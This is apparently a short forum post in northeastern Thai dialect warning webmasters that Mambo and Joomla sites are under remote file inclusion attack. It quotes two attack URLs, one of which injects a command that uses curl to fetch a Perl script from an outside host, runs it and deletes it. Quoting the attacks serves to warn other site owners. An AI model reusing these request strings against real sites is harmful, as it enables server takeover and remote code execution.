บ่ว่าแมมโบ้หรือจูมล่า ก็มีปัญหากับการถูกหลอยเอาข้อมูลขึ้นไปรันเทิง server เด้อ
กะเรียกใช้โปรแกรมของแมมโบ้นั่นหละ แตว่าขาเจ้าผ่าน parameter ไปแบบนี้
ตัวอย่าง ขะเจ้าโพสต์ฟอร์มมาที่นี่
โค้ด:
"http://(เว็บของเฮา)/components/com_joomlaboard/image_upload.php?sbp=http://towardspakistan.com/tmp/sikat.txt?
นี่แฮงเป็นตาหน่าย นอกจากเอาไฟล์ขึ้นไปไว้แล้ว ยังสั่งรันพร้อม จะแม่นเป็นตาหน่าย
โค้ด:
http://(เว็บเฮา)...../modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.tamashisound.it/httpds/tool.gif?
&cmd=cd%20/tmp/;curl%20-O%20http://www.tamashisound.it/httpds/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*?